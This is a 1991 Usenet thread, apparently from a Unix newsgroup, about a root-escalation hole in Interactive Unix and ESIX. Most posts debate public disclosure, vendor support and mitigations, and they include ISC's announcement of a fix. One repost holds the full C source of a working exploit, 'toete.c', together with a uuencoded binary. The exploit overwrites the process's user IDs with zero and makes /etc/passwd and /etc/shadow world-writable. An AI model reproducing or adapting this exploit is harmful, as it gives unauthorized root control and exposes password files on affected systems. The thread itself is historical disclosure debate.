custody of all connections to the outside world and all user access other
than a couple of people that I can go strangle if they betray me.  That is
*very* extreme, but I have been successfully attacked and vandalized so my
paranoia has some basis.  I think the post was completely correct and proper
because he made it clear that he had notified ISC and they had either
stonewalled or ignored him.  I would prefer to believe that ISC didn't
know about the hole but my personal opinion is that they knew and shipped
anyway.

>   The only way to protect ourselves, for now, is that those who have 
>   read the posting should inform their system administrators that the
>   bug exists and the system admins can ask (Tell) everyone to not do 
>   it.

I would take it a step farther.  I would delete or inactivate any user
account that you do not know and trust.  That can be a touchy situation
sometimes but necessary if you place any value on the security of your
system and its contents.  I think that you must presume that someone will
get mischievious and take a joy ride.  Even experts can bruise the foliage
in a high speed chase.

>-- 
> +-  Bill England,  wengland@stephsf.COM -----------------------------------+
> |   * *      H -> He +24Mev                                                |
> |  * * * ... Oooo, we're having so much fun making itty bitty suns *       |
> |__ * * ___________________________________________________________________| 

I'm rather surprised at how calm and quiet everyone is about this.  For the
purpose of making my point I'll ASSume that Interactive knew about this and
didn't tell anyone.  I have no such evidence but it illustrates my point.

Your (and my) UNIX vendor shipped an operating system that they _knew_ had
a huge gaping security hole in it.  They took your money and exposed you to
Lord knows what.  Now, after (if we're to believe the original article and I
do) several days, there's no confirmation or denial from Interactive and no
howls of outrage from those standing in the wind with their bathrobes at half
mast.  I guess that this confirms what I believe was their opinion in the
first place, who cares?  Well damn it!  I care!  Maybe I care too much and
have a gatekeeper to keep joy riders out, but I think that each and every one
of you should care and should care more than I do.  On the other hand, maybe
we are just hobby players, maybe these systems are toys, don't produce any
meaningful work, cost $$ within discretionary budgets, or we're just amateurs
who don't understand the consequences of a rogue with root permissions.
-- 
Bill Kennedy  usenet      {att,cs.utexas.edu,pyramid!daver}!ssbn.wlk.com!bill
              internet    bill@ssbn.WLK.COM   or attmail!ssbn!bill

bill@ssbn.WLK.COM (Bill Kennedy) (02/14/91)

I've made my point in an earlier article so I'll trim this and limit
comments to the inflamed nerve that everyone should have wagging by now.

chris@alderan.uucp (Christoph Splittgerber) writes:
[ repeats the bug claim and calls it a SECURITY ABYSS... ]
>
>I don't like ISC's upgrade provision clauses and I don't wana pay for this
>bugfix.
>
>So what to do now ? .....  -:(  -:(  -:(

A question that has gone unanswered from time to time is if we have no
support (extortion) agreement, how do we report bugs and learn of fixes.
This one seems to have been reported adequately, reproduced and confirmed,
Why the silence about a fix?  Oh...  OK, I didn't buy a support agreement.

What we're failing to recognize is that this feature was constructed as
a bomb shelter some time ago.  It was only recently converted to a hardened
command and control facility but nobody told those of us who were inside.
-- 
Bill Kennedy  usenet      {att,cs.utexas.edu,pyramid!daver}!ssbn.wlk.com!bill
              internet    bill@ssbn.WLK.COM   or attmail!ssbn!bill

wcr@tree.metrolink.com (W.c. Rothanburg) (02/14/91)

In article <6A5NSZK@dobag.in-berlin.de> lumpi@dobag.in-berlin.de (Joern Lubkoll) writes:

   marc@jahangir.UUCP (Marc Rossner) writes:

   >> In article <1991Feb11.184130.11321@jwt.UUCP> john@jwt.UUCP (John Temples) writes:
   >> >Yikes.  This also works on ESIX-D without a coprocessor, and on ISC 2.0.2
   >> >*with* a coprocessor.  It failed on Microport 2.2 with a coprocessor.
   >> >Now, the question is, what do we do to protect ourselves in the meantime?
   >Works like a charm on ISC 2.2 with a 486 -- good thing the only people
   >over here that read this newsgroup already know the root password.
   >"Feature", indeed!  Hope ISC hears a lot about this, if anyone can ever
   >get past the 15 minutes it takes their telephone guy to locate you in his
   >files before he'll let you discuss anything real.
   Set UAREAUS and UAREARW to zero and it won't work any more !
   But this works onlu on ISC 2.2 and not on 2.02. No 2.02 system can be 
   protected !

The only problem with setting UAREAUS and UAREAW to zero is you
cannot do any floating point operations without a co-processor.  
(I don't have a co-processor to try it with... <sigh>)

We (at Metro Link) have found the AT&T Unix/386 appears to have the
same problem.  (I heard this second hand and don't know from whom.)  

Bill

--
Who  : Metro Link, Inc.
What : X11.R4. for ISC Unix 386/ix, SCO Unix/386, and Everex ESIX
Where: 2213 West Mc Nab Road, Pompano Beach,FL 33069
Sales: sales@metrolink.com
Email: wcr@metrolink.com
Phone: +1 305 970 7353 x927
Fax  : +1 305 970 7351

jrh@mustang.dell.com (James Howard) (02/14/91)

In article <1991Feb13.192107.8135@digibd.com>, rhealey@digibd.com (Rob
Healey) writes:
 > In article <1991Feb12.052336.29639@motcad.portal.com>
jtc@motcad.portal.com (J.T. Conklin) writes:
 > >>Now, the question is, what do we do to protect ourselves in the meantime?
 > >If I remember correctly, Sun Microsystems sent out a fixed version of 
 > >sendmail to its customer base free of charge the week after the Internet
 > >Worm Attack.  I see no reason why we should expect less from the i386
 > >UNIX vendors.  In my opinion, any vendor that doesn't respond to this
 > >problem with the attention it is due, doesn't deserve to be in business.
 > >
 > 
 > 	I'd consider extending this to any vendor that didn't catch this
 > 	BEFORE the system was shipped doesn't deserve to be in business.
 > 
 > 	HOW can the QA dept. of ANY UNIX system miss a bug of this
 > 	magnitude? After all, they should have had unexplained system
 > 	panics when the test that scribbles over all of a USER mode virtual
 > 	address space to check MMU problems scribbles all over the ublock...


Good question.  I have tried the program posted earlier on both Dell 
SVR3.2 (which is ISC 2.0.2 based) and Dell SVR4.0 (not in any way 
related to ISC ;-) ).  It core dumps faithfully on both.  


James Howard        Dell Computer Corp.        !'s:uunet!dell!mustang!jrh
(512) 343-3480      9505 Arboretum Blvd        @'s:jrh@mustang.dell.com
                    Austin, TX 78759-7299   

aschaffe@polyslo.CalPoly.EDU (JedHead) (02/14/91)

So then martys@ism.isc.com announced:
>
>For all other users, INTERACTIVE Systems Corp. will provide a
>comprehensive fix to the problem. [...]
>      As with all INTERACTIVE bug-fix diskettes, it will be
>available free of charge through the Support department.
>
>Interactive Systems Corp.

Huge kudos going out to the person who alerted the net to the Security
Hole.. I, too, had some reservations at first about the propriety of
releasing that information "to the world", but quickly realized that it
was a sure-fire way to get a reaction from the vendors...

A 3-day cycle from the "Hey, ISC!" message to an announcement of a free
bug fix is something to be impressed with..

Allan
aschaffe@polyslo.calpoly.edu

-- 
A top Mideast expert at a major American university pointed out that
there is one final chance for a diplomatic solution to the Persian Gulf
crisis that hasn't been tried.  The United States must send a message
to Saddam Hussein saying "SIMON SAYS get out of Kuwait."

davidg@aegis.UUCP (Dave McLane) (02/14/91)

> It's going to be very interesting to see how fast ISC responds to this
> now...

As a sample of how "fast" ISC responds, I have been trying for a
month to get them to send me a replacement for the disk that was
supposed to update my $2149 Architech Developer to Multi-User. The
disk got an Uncorrectable data read error, not doubt because the
little cutout for the timing signal hole was running around loose
in the disk which happened to drop out on my foot when I pulled the
disk out ... "Eh, what's that. Oh shit!"

They won't send me a new disk as they claim that I can't possibly
have the disk as the registration number doesn't include
multi-user, even though I faxed them the invoice from Programmer's
Connection where I bought it which clearly states that I have.

Fortunately, Michele Steiner at Prog. Con. was a bit more understanding
and has said that she ISC will send her a disk (in a week) and she will
mail it to me. Kudos to Michele, and a big Bronx cheer to ISC.

New, but related subject: when ISC fires up after the login it puts
this really grotesque series of lines about copyrights and such
which I would like to get rid of. Anybody know if this is possible?

--Dave

==== The Aegis Society =============================================
Minami Hirao 1-6, Imazato                 The content and process of
Nagaokakyo-shi, Kyoto-fu, 617 Japan           international/cultural
Tel: +81-75-951-1168 Fax: +81-75-957-1087             communication.
====================================================================

chip@chinacat.Unicom.COM (Chip Rosenthal) (02/14/91)

<<< extreme heresy alert >>>

In article <6913@rsiatl.Dixie.Com> jgd@Dixie.Com (John G. DeArmond) writes:
>I say "THANK YOU" to all the people involved.  The system of free flowing
>information work again.

John - let me take this a step further.  I'm concerned about the bug, but
there are other things which worry me more.  Granted, this is a horrendous
problem.  But it is one of a transient nature.  It will get fixed, and
it will get fixed fairly quickly.

What bothers me is the total, absolute breakdown of the ISC support
mechanism.  Bug reporting through whistleblowing is not acceptable.  It
troubles me deeply that the entire world has to be rallied to get a bug
fixed.  Furthermore, if the ISC support mechanism is incapable of handling
a bug of this magnitude, I shudder to think how the 99.999% bugs of lesser
severity are handled.

There is a technical issue which must be addressed, and must be addressed
fast.  Beyond that, there exists a management issue of a very troubling
nature.  ISC owes its users a fix.  More importantly, ISC owes its users
some corrective action.  ISC's support is broken and needs to be fixed.
I hope when the bug fix is released, we are also provided a corrective
action plan by which ISC will fix its support.

Currently, Unicom Systems uses one vendor's 3.2 UNIX on 386 boxen.  Over
the next few months, we will be sorting out our strategy towards a next
generation UNIX.  I hate to sound cavalier about this problem, but the
existence of this bug is not a knockout blow for my evaluations.  The
fact that ISC's support mechanism has broken down is a knockout.  And I
can't help but feel there are other folks out there trying to figure out
what comes after 3.2.

Oh...and to the person who dragged C2 into this.  The access requirements
of C2 would not prevent this problem - although they might restrict what
you can do once you've got your UID of zero.  Unfortunately, these
restrictions also apply if you get a UID of zero through legitimate means,
e.g. `su'.  That is the Secureware stuff SCO shoves down your throat and
ISC offers as an option would pass on the same damn inconveniences no
matter how you get your UID of zero - legitimately or otherwise.  C2
certifiabilty is no panacea.  In fact, even with SCO's Secureware, you
can get root access in 8 seconds if you drop the `mesg n' from /.profile.
Secureware doesn't help the fact that remote.unknown is distributed with
the wrong permissions, thus allowing unknown systems uucp access.  And
if you fix this, you still won't get the breakins logged unless you go
fixing logfile permissions.  If UNIX is broken, no amount of C2 cruft is
going to fix it.

-- 
Chip Rosenthal  512-482-8260  |
Unicom Systems Development    |    I saw Elvis in my wtmp file.
<chip@chinacat.Unicom.COM>    |

mhoffos@janus.mtroyal.ab.ca (02/14/91)

In article <529@jahangir.UUCP>, marc@jahangir.UUCP (Marc Rossner) writes:
>> In article <1991Feb11.184130.11321@jwt.UUCP> john@jwt.UUCP (John Temples) writes:
>> >Yikes.  This also works on ESIX-D without a coprocessor, and on ISC 2.0.2
>> >*with* a coprocessor.  It failed on Microport 2.2 with a coprocessor.
>> >Now, the question is, what do we do to protect ourselves in the meantime?
> 
> Works like a charm on ISC 2.2 with a 486 -- good thing the only people
> over here that read this newsgroup already know the root password.
> "Feature", indeed!  Hope ISC hears a lot about this, if anyone can ever
> get past the 15 minutes it takes their telephone guy to locate you in his
> files before he'll let you discuss anything real.
> 
> Marc Rossner
> jahangir!marc@uunet.uu.net


The bug bites on a 486 under ESIX Rev. D too ... if anyone figures out a
workaround it would be much appreciated; has anyone spoke with Everex yet?

Mike Hoffos
--
mhoffos@janus.mtroyal.ab.ca
(Mount Royal College is a community college in Calgary, Alberta)

Disclaimer:     Mount Royal College doesn't speak for me, and I *certainly*
                don't speak for it.

lumpi@dobag.in-berlin.de (Joern Lubkoll) (02/14/91)

Because of myself gettings lots of mail about my posting not comeing
through to some sites, here is another repost. Whoever eats this posting
should be aware of being a news-censor !

--------- ORIGINAL POSTING FOLLOWS -----------

It was a long process of thoughts about this, but now, after half
a year of disput with interactive, here it finally is:

--- jl

Hello you at Interactive Systems Coporation !

it seems that your very cute interactive unix System has a nice bug !

EVERYONE you has access to a shell and a compiler or an interactive
System at home (to upload binaries) CAN BECOME ROOT.

It seems that you programmers aren't able to programm the 386 protected
mode correct. It exists the possibillity to write protect segment and
pages... It would be very useful to write protect the internatl data-
structures whicht the system uses to store information about the user.

Offering the ability to write in these segments is just like offering
CIA - Identity cards per mail-order for everyone (SALE $5).

If you don't believe... try the litte program down there and you'll see !

I didn't believe it either but ... see yourself !

I expect bug-fixes immediatly or my money back for the interactive
system...  VERY soon please !

I have had a lot of conversation with 'Intra Unix' in Germany and a
lot of people at 'ico.isc.com' about the problem. They just told
me this being a only a 'feature' not a bug !

Simply said, it is a bug in the coprocessor emulation code, which
will allow system without a co-cpu to be broken, just because some
programmers aren't able to allocate their own buffers :-)

If you have a co-cpu and Release >= 2.2 you may set the kernel tuneable
parameters UAREAUS and UAREARW to 0 to protect yourself.

Dobag does not have this problem, due to it being a 486 System, but
there will be a lot of systems without a co-cpu !

There is only one way to fix this problem: Phone Interactive or your
Distributor and get very angry !

Next follows toete.c, the program to kill any isc system not being
equipped with a co cpu.

--- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE

/* If you use Interactive Unix 2.2 uncomment the following line */
/* #define ISC22 */

#include <stdio.h> 
#ifdef ISC22
#include <sys/limits.h>
#include <sys/unistd.h>
#else
#include <limits.h>
#include <unistd.h>
#endif
#include <sys/sysi86.h>
#include <sys/signal.h>
#include <sys/types.h>
#define ushort	unsigned short
#define ulong	unsigned long
#include <sys/fs/s5dir.h>
#include <sys/user.h>

main()
{
  struct user *dumm;

  /*  0xE0000000 is the virtual adress of the ublock for the current
      running programm. */

  dumm = (struct user *) 0xE0000000;
	
  /*  Here we are so kind to change our effective and real user id
      to zero, which means, that we can do whatever we want... */

  dumm-> u_uid = 0;    /* A well programmed system has to give a
			  segmentation oder protection violation
			  error at this line. But don't expect
			  Interactive Unix to do so... */
  dumm-> u_gid = 0;

  dumm-> u_ruid = 0;
  dumm-> u_rgid = 0;
	
  /*  What would be the first thing you want to do if you become root
      on another system ? */

  chmod ("/etc/passwd",(int) 0666);
  chmod ("/etc/shadow",(int) 0666);

  /*  If you don't believe what I say, uncomment the following line: */

/*  execl("/bin/sh","sh","-c","/bin/ls -l /etc/passwd",(char *) 0); */
}

--- END OF toete.c ---

For those, which won't believe, here is a uuencoded version of the
binary 'toete'.

table
 !"#$%&'()*+,-./0123456789:;<=>?
@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_
begin 644 toete
M3 $$ *+Q%"<          !P #P$+ 0  S (  #P"        U    -    "<z
M T  +G1E>'0   #0    T    ,P"  #0                    (    "YDy
M871A    G -  )P#0  \ @  G ,                  $     N8G-S    x
M -@%0 #8!4                            "     +F-O;6UE;G0     w
M          #8!0                    (  ,.0D)"#[ B+[(M%"(U4A1")v
M%9P#0 !2C54,4E#HW____VH Z)    "#Q 3H'    (/$#%#H<P(  &H N $ u
M  ":      < ],.0D)#K2\=%_    ."+1?QFQX#J$     "+1?QFQX#L$   t
M  "+1?QFQX#N$     "+1?QFQX#P$     !HM@$  &B@ T  Z P   "#Q C)s
MPU6+[%#KKY"X#P   )H     !P /@NX!   SP,.0D)!5B^R![(0"  !75K[_r
M____@WT( '4Q:+0%0 #HP    %F%P(E%"'0)BT4(B@"$P'46@#VP!4   '0&q
M,\!>7\G#QT4(O05  ,8%L 5   !HPP5  (U%@%#H6 $  (/$"/]U"(U%CE#Hp
M20$  (/$"&H C46 4.@3 0  @\0(A<"+^'P^: ("  "-A7[]__]05^@, 0  o
M@\0,/0("  !U&V@" @  C85^_?__4&BL T  Z+0   "#Q PS]E?H"0   %F+n
MQEY?R<.0D+@&    F@     '  ^"#@$  #/ PY"0D%6+[%=64XM]"(L=G - m
M (7;=24SP%M>7\G#D)#_,X/#!%?H&0   (/$"(7 B_!T"(O&6UY?R<.0@SL l
M==_KU)!5B^Q75HM]"(MU#.L.D)"0#[X'1ST]    =!P/O@</OA9&.\)TZHH'k
MA,!U% ^^1O\]/0   '4)B\9>7\G#D)"0,\!>7\G#D)!75HM\) R+="00BTPDj
M%(O'B]'!Z0+SI8O*@>$#    \Z1>7\.X!0   )H     !P /@DH   ##D+@#i
M    F@     '  ^"-@   ,.05XO6BWPD##/ N?_____RKO?1BW0D#(M\) B+h
MP<'I O.EB\B!X0,   #SI(M$) B+\E_#D*/4!4  N/_____#D.@7    BU0Dg
M!+@!    F@     '  ^"V?___\/#D)"0     "]E=&,O<&%S<W=D   @(" @f
M(" @(" H*"@H*" @(" @(" @(" @(" @(" @($@0$! 0$! 0$! 0$! 0$!"$e
MA(2$A(2$A(2$$! 0$! 0$(&!@8&!@0$! 0$! 0$! 0$! 0$! 0$! 0$!$! 0d
M$! 0@H*"@H*" @(" @(" @(" @(" @(" @(" @(0$! 0(               c
M                                                            b
M                                                            a
M                                       ! @,$!08'" D*"PP-#@\0z
M$1(3%!46%Q@9&AL<'1X?("$B(R0E)B<H*2HK+"TN+S Q,C,T-38W.#DZ.SP]y
M/C] 86)C9&5F9VAI:FML;6YO<'%R<W1U=G=X>7I;7%U>7V!!0D-$149'2$E*x
M2TQ-3D]045)35%565UA96GM\?7Y_                                w
M                                                            v
M                                                            u
M                      $   !#2%)#3$%34P!A<V-I:0 O;&EB+V-H<F-Lt
+87-S+P          s
 r
end


--- END ---

JUST HAVE FUN !

mfg. JL

-- 
lumpi@dobag.in-berlin.de  --  "Nothing is the complete absence of everything."

lumpi@dobag.in-berlin.de (Joern Lubkoll) (02/14/91)

chris@alderan.uucp (Christoph Splittgerber) writes:
>In article <KR3NBQQ@dobag.in-berlin.de> lumpi@dobag.in-berlin.de (Joern Lubkoll) writes:
>>it seems that your very cute interactive unix System has a nice bug !
>Oh my god - its really true. (on my ISC 2.0.2 *with* co-proc.)
2.02 cannot be made secure. Only 2.2 can be made secure with
co-cpu and setting UAREAUS and UAREARW to zero.

jl

>While we've all been discussing security holes in the file-system and
>talked about SUID and SGID and all that stuff there is a way to break
>everything and it's so goddam easy that it's hard to believe it.
>It's not a security hole, it's a SECURITY ABYSS.
so it is !

>I don't like ISC's upgrate provision clauses and I don't wana pay for this
>bugfix.
i don't want to pay anything too ! And a lot of others won't pay too, I
hope !

>So what to do now ? .....  -:(  -:(  -:(
refer to alt.suicide

jl

-- 
lumpi@dobag.in-berlin.de  --  "Nothing is the complete absence of everything."

ken@metaware.metaware.com (ken) (02/14/91)

In article sef@kithrup.COM (Sean Eric Fagan) writes:
-In article bekesy@uhccux.uhcc.Hawaii.Edu (Bekesey Lab) writes:
----Now, the question is, what do we do to protect ourselves in the meantime?
---Get SCO.  [...]
--Please keep your mindless SCO chauvinism to yourself.
-
-Gee, that's funny.  When people complain all about SCO's problems, and other
-people respond with "Get ISC or ESIX," I don't see you complaining about
-that.


Sean,

I think you got flammed for posting a rather blatent advertisement for SCO.
Most people probably know that you work there and that you have rather biased
opinions about SCO's products.  That type of posting is generally frowned
upon.  



-- 
Ken "DOS by any other name will still be a kludge" Chapin

internet:	ken@metaware.com
uucp:		...!{ucscc|uunet}!metaware!ken

brando@uicsl.csl.uiuc.edu (Brandon Brown) (02/15/91)

davidg@aegis.UUCP (Dave McLane) writes:

>> It's going to be very interesting to see how fast ISC responds to this
>> now...

>As a sample of how "fast" ISC responds, I have been trying for a
>month to get them to send me a replacement for the disk that was
>supposed to update my $2149 Architech Developer to Multi-User. The
>disk got an Uncorrectable data read error, not doubt because the
>little cutout for the timing signal hole was running around loose
>in the disk which happened to drop out on my foot when I pulled the
>disk out ... "Eh, what's that. Oh shit!"

Dave, sorry you have had a "bad experience" with ISC. I have never had
anything but GREAT response, even a time when I trashed my install diskette
4 times before moving my 16-bit video card to an 8-bit slot. (Terrible fix,
I know, but all I wanted to do was get a working system going.) On each
occasion I received a replacement install disk UPS RED. 

As for technical support, I have been supported well, even after the announce-
ment of the "response" contracts.

I subscribed to the "Response ix" section so I can get the updates for one
cost, but I would agree that I think that is bogus. I think the people should
pay for the shipping and the cost of the diskette, but we shouldn't have
to pay for engineering on a "bug" fix...

Just my $0.02 worth.

Brandon 

+-----------------------------------------------------------------------------+
|  Brandon Brown                     | Internet: brando@uicsl.csl.uiuc.edu    |
|  Coordinated Science Laboratory    | UUCP:	 uiucuxc!addamax!brando!brown |
|  University of Illinois            | CompuServe: 73040,447                  |
|  Urbana, IL  61801                 | GEnie:    macbrando                    |
+-----------------------------------------------------------------------------+

jgd@Dixie.Com (John G. DeArmond) (02/15/91)

bill@ssbn.WLK.COM (Bill Kennedy) writes:

>first place, who cares?  Well damn it!  I care!  Maybe I care too much and
>have a gatekeeper to keep joy riders out, but I think that each and every one
>of you should care and should care more than I do.  On the other hand, maybe
>we are just hobby players, maybe these systems are toys, don't produce any
>meaningful work, cost $$ within discretionary budgets, or we're just amateurs
>who don't understand the consequences of a rogue with root permissions.

Boy, you see everything on this network.  Bill, how in the world did you
work your logic around from delivering a deserved flame to Interactive
and others to flaming users who've not publicly gone on afterburner over
the issue? 

Could it be that the spat of silence from many people who normally would
be at Dresden incendiary levels by now is because their lawyers have told them
to keep their mouths shout while they prepare cases?

John

-- 
John De Armond, WD4OQC        | "Purveyors of speed to the Trade"  (tm)
Rapid Deployment System, Inc. |  Home of the Nidgets (tm)
Marietta, Ga                  | 
{emory,uunet}!rsiatl!jgd      |"Politically InCorrect.. And damn proud of it  

mburg@unix386.Convergent.COM (Mike Burg) (02/15/91)

In article <27B93F44.5606@tct.uucp>, chip@tct.uucp (Chip Salzenberg) writes:
> According to jpp@specialix.co.uk (John Pettitt):
> >We have confirmed that this does indeed work on ISC 2.2 and that SCO
> >unix does `the right thing' (tm) and core dumps the application.
> 
> It is good to see that SCO's engineers, unlike those at ISC and
> Everex, have an effective grasp on the basic principles of memory
> protection covered in the first semester of OS design class.

A two sided coin problem...

From a view of a person who has work for various Unix system houses -
you can't really blame ISC, ESIX, or any other vendors that current has the
bug in it's release. I think the blame should be placed on AT&T. They are the
ones who are (were) shipping the base source with the bug. Most AT&T UNIX
vendors typically only concentrate on adding more options to the system
(i.e. X-Windows, more controller card support, networking). They usually
don't looking into rats mazes like memory managment. Now, look it from the
vendors eye's - You'd be expecting for AT&T to ship a somewhat "secure" (if
you can call it that) product, without serious holes like this one. Logical 
conculsion - concentrate on value and price. But after this, I guess not.
There's only so much a systems house can concentrate on, and some of them
are poorly understaffed.

ON THE OTHER HAND, since you are buying a product from the vendors, you'd
*EXPECT THEM* to sell you a stable product. Kinda of like selling you a 
new car, then having it going out of control because your kid decided to
change the radio station.

Face it folks, all versions of Unix for the PC have problems of some kind.
(Just a matter of what size the explosion will be when it goes off in your
face) It ain't no Ginsu knive offer - ("It dices, it slices, it's a
mutlitasking OS and a teeth cleaner! And if you order now you'll receive....")


-- 
----------------------------------
Michael Burg -  Unisys/Convergent Corp.  Unix Intel Platforms Division San Jose
Phone: (408) 456-5934 UUCP: uunet!pyramid!ctnews!unix386.Convergent.com!mburg

sef@kithrup.COM (Sean Eric Fagan) (02/15/91)

In article <1991Feb14.142947.1777@metaware.metaware.com> ken@metaware.UUCP (ken) writes:
>I think you got flammed for posting a rather blatent advertisement for SCO.
>Most people probably know that you work there and that you have rather biased
>opinions about SCO's products.  That type of posting is generally frowned
>upon.  

Paraphrasing from some posts a couple of months ago:

"SCO UNIX isn't real UNIX.  The C2 braindamagedness breaks it.  I suggest
you buy ISC or ESIX instead, which don't have this problem."

Such sentiments were expressed many times.

The fact that I work at SCO is irrelevent.  SCO UNIX does not have the bug
that was described, and, in fact, has never had it (nor will it ever; we
won't have to worry about something slipping through the cracks and
reintroducing it, nor will we have to worry about how many of our sites out
there have it, etc.).

For that reason, I answered, 'How do we fix it?' with 'get SCO UNIX,' the
same way other people have answered, 'How do we get rid of C2 in SCO' wtih
'Buy ISC [or esix, or dell, or sysvr4, etc].'  I say that as a satisfied
user of sco *nix, not as an employee of sco.  If I were saying it as an
employee, I would have posted it from work, not home.  Or did you and the
pseudo-account fail to notice that there was no 'sco.com' in the address of
my posting?

-- 
Sean Eric Fagan  | "I made the universe, but please don't blame me for it;
sef@kithrup.COM  |  I had a bellyache at the time."
-----------------+           -- The Turtle (Stephen King, _It_)
Any opinions expressed are my own, and generally unpopular with others.

sef@kithrup.COM (Sean Eric Fagan) (02/15/91)

In article <1991Feb13.221259.1462@scuzzy.in-berlin.de> src@scuzzy.in-berlin.de (Heiko Blume) writes:
>not exactly, for public access to my source archive i've set up
>a chroot() user that can't write anywhere, unhackable :-)

Sorry, that's not the case.  Once you've got root access, you can go through
and do lots of nasty things, including setting u.u_rdir to something useful,
like '/'.  Figuring out how to do so is left as an excercise for the reader.

-- 
Sean Eric Fagan  | "I made the universe, but please don't blame me for it;
sef@kithrup.COM  |  I had a bellyache at the time."
-----------------+           -- The Turtle (Stephen King, _It_)
Any opinions expressed are my own, and generally unpopular with others.

wengland@stephsf.stephsf.com (Bill England) (02/15/91)

In article <1854@chinacat.Unicom.COM> chip@chinacat.Unicom.COM (Chip Rosenthal) writes:
>
[...]
>fixing logfile permissions.  If UNIX is broken, no amount of C2 cruft is
>going to fix it.


   True.  Presumeably when you purchase the rights to use SecureWare's
   tools they give you a _test_suite_ of ice-breaking software that tests 
   for security bugs on your system.  It would be bad advertising indeed
   to certify a system C2 and then have this bug unvieled.  :-)

   As for the Uucp I believe that having strict C2 requires NOT using
   UUCP and disallowing ftp.  I'm not sure if TCP/IP would be 
   considered a C2 security violation and even running an xterm may
   be a problem.

-- 
 +-  Bill England,  wengland@stephsf.COM -----------------------------------+
 |   * *      H -> He +24Mev                                                |
 |  * * * ... Oooo, we're having so much fun making itty bitty suns *       |
 |__ * * ___________________________________________________________________| 

tron1@tronsbox.xei.com (Kenneth Jamieson) (02/15/91)

an someone please mail me the test program ??? I have a wierd co-proc
in my 387 (a '287) and I need to know if I am safe or not.


-- 
========[ Xanadu Enterprises Inc. Amiga & Unix Software Development]=======
= "I know how you feel, you don't know if you want to hit me or kiss me - =
=  --- I get a lot of that."  Madonna as Breathless Mahoney (Dick Tracy)  =
=========== Ken Jamieson: uunet!tronsbox.xei.com!tron1  ===================
=     NONE of the opinions represented here are endorsed by anybody.      =
=== The Romantic Encounters BBS 201-759-8450(PEP) / 201-759-8568(2400) ==== 

john@jwt.UUCP (John Temples) (02/15/91)

In article <15126@uudell.dell.com> jrh@mustang.dell.com (James Howard) writes:
>I have tried the program posted earlier on both Dell 
>SVR3.2 (which is ISC 2.0.2 based) and Dell SVR4.0 (not in any way 
>related to ISC ;-) ).  It core dumps faithfully on both.  

Based on what I've read here (not just in regards to the security
hole), I'm starting to get the feeling that Dell is the only UNIX
vendor that has its act together.  I think I might just buy Dell's
SVR4.0 even though upgrading my ESIX will probably be cheaper.
-- 
John W. Temples -- john@jwt.UUCP (uunet!jwt!john)

sef@kithrup.COM (Sean Eric Fagan) (02/15/91)

In article <6027@unix386.Convergent.COM> mburg@unix386.Convergent.COM (Mike Burg) writes:
>I think the blame should be placed on AT&T. They are the
>ones who are (were) shipping the base source with the bug. Most AT&T UNIX
>vendors typically only concentrate on adding more options to the system
>(i.e. X-Windows, more controller card support, networking). They usually
>don't looking into rats mazes like memory managment. 

On the other hand, the three companies involved in porting SysVr3.2 to the
'386 were (to the best of my knowledge, mind you) AT&T, Intel, and ISC.
Although I will not name names, I will comment that someone whose opinion I
respect very much has laid the blame on intel for this.  That is hearsay,
though, so take it with a grain of salt.

>You'd be expecting for AT&T to ship a somewhat "secure" (if
>you can call it that) product, without serious holes like this one. Logical 
>conculsion - concentrate on value and price. 

Someone commented that AT&T fixed it in their 3.2.1 product; should I take
this discussion to alt.conspiracy? 8-) 8-) 8-)

-- 
Sean Eric Fagan  | "I made the universe, but please don't blame me for it;
sef@kithrup.COM  |  I had a bellyache at the time."
-----------------+           -- The Turtle (Stephen King, _It_)
Any opinions expressed are my own, and generally unpopular with others.

bekesy@uhccux.uhcc.Hawaii.Edu (Bekesey Lab) (02/15/91)

In article <1991Feb14.004122.1564@ism.isc.com> martys@ism.isc.com writes:
} [...]
} 
} For all other users, INTERACTIVE Systems Corp. will provide a
} comprehensive fix to the problem.  It will be provided as an
} update (bug-fix) diskette to users of 386/ix Version 2.0.2,
} INTERACTIVE UNIX Version 2.2.1, and the C2 Security Extension.
} For Version 2.2 users without a math coprocessor, call into
} Warranty support, (213) 453-8649 and ask for the free upgrade
} to Version 2.2.1 as well as the 2.2.1 security-hole bug-fix
} diskette.  As with all INTERACTIVE bug-fix diskettes, it will be
} available free of charge through the Support department.

This is an URGENT problem.  Are you going to force us to suffer
through your blasted "support" phone, and wait for disks to be
mailed!?

Or are you going to post the fix like the reasonable outfits do?

chris@alderan.uucp (Christoph Splittgerber) (02/15/91)

In article <P46NPCO@dobag.in-berlin.de> lumpi@dobag.in-berlin.de (Joern Lubkoll) writes:
>chris@alderan.uucp (Christoph Splittgerber) writes:
>>In article <KR3NBQQ@dobag.in-berlin.de> lumpi@dobag.in-berlin.de (Joern Lubkoll) writes:

>>It's not a security hole, it's a SECURITY ABYSS.
>so it is !
>[]

>>So what to do now ? .....  -:(  -:(  -:(
>refer to alt.suicide

I don't know how much work it will be for ISC to fix this for 2.0.2
but as an alternative to alt.suicide I can think of a way that would
make at least a few people feel more secure again.
If they just release the changes they made to 2.2, then at least the
people with a co-proc. (like me) could help theirself.

                Chris
-- 
************************ Brain fault (core dumped) *************************
Replies-To:  chris@alderan.uucp        UUCP: uunet!mcsun!unido!alderan!chris 
Phone:       +49 711 344375            Fax:  +49 711 3460684

tim@dell.co.uk (Tim Wright) (02/15/91)

In <1991Feb14.201602.21248@kithrup.COM> sef@kithrup.COM (Sean Eric Fagan) writes:

>In article <1991Feb13.221259.1462@scuzzy.in-berlin.de> src@scuzzy.in-berlin.de (Heiko Blume) writes:
>>not exactly, for public access to my source archive i've set up
>>a chroot() user that can't write anywhere, unhackable :-)

>Sorry, that's not the case.  Once you've got root access, you can go through
>and do lots of nasty things, including setting u.u_rdir to something useful,
>like '/'.  Figuring out how to do so is left as an excercise for the reader.

I think the point being made was that under that setup, how could you become
root ?? Without write-access to directories, you can't create the program
needed to break the system. As he said, unhackable (at least w.r.t. the bug
under discussion).

Tim
--
Tim Wright, Dell Computer Corp. (UK) | Email address
Bracknell, Berkshire, RG12 1RW       | Domain: tim@dell.co.uk
Tel: +44-344-860456                  | Uucp: ...!ukc!delluk!tim
"What's the problem? You've got an IQ of six thousand, haven't you?"

lumpi@dobag.in-berlin.de (Joern Lubkoll) (02/15/91)

davidg@aegis.UUCP (Dave McLane) writes:
>New, but related subject: when ISC fires up after the login it puts
>this really grotesque series of lines about copyrights and such
>which I would like to get rid of. Anybody know if this is possible?
use a binary editor and patch zero-bytes at beginning of the copyright
strings, they will never be seen again..

jl
-- 
lumpi@dobag.in-berlin.de  --  "Nothing is the complete absence of everything."
